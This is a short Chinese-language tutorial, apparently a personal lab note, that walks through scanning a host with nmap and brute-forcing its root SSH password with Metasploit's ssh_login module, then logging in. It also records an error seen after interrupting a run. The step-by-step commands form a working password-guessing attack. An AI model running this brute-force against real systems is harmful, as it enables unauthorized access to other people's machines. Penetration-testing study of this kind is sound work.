auxiliary/scanner/ssh/ssh_login 这个模块扫描很慢,建议使用其它多线程工具扫描。
-
在终端中输入命令“nmap 192.168.1.3”,对目标主机进行端口扫描,发现主机开放22端口;
-
在终端中输入命令“msfconsole”,启动MSF终端
-
在终端中输入命令“search ssh_login”,搜索ssh_login的相关工具和攻击载荷;
-
在终端中输入命令“use auxiliary/scanner/ssh/ssh_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下;
-
在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数;
-
在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址;
-
在终端中输入“set USERNAME root”,指定登陆用户名root;
-
在终端中输入“set PASS_FILE /home/passwd.txt”,设置暴利破解的密码文件路径;
-
在终端中输入“set THREADS 50”,设置暴利破解的线程数为50;
-
在终端中输入“run”,开始向目标主机爆破ssh的登陆帐号和密码,如果爆破成功,就会显示登陆帐号为root,密码为Xxx;
-
在终端中输入“ssh root@192.168.1.3”,连接目标主机;
注意:
在扫描中,如果使用ctr + c 中断之后,重新run ,就会报错,我想到的解决方式就是重新打开msf。
[-] Auxiliary failed: JSON::ParserError 783: unexpected token at '<h1>Internal Server Error</h1>'
[-] Call stack:
[-] /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/json-2.3.0/lib/json/common.rb:156:in `parse'
...
参考
https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/